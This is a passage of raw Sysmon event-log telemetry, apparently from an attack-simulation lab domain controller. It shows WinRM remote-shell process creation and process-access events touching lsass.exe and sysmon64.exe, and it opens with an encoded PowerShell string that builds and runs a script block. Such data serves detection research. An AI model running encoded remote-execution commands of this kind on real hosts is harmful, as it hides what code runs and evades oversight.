QgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.669{266CAFBE-62DD-6064-1400-00000000AD01}13401692C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.669{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.653{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-CE02-00000000AD01}2164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.643{266CAFBE-643E-6064-CD02-00000000AD01}3704C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.450{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.450{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dl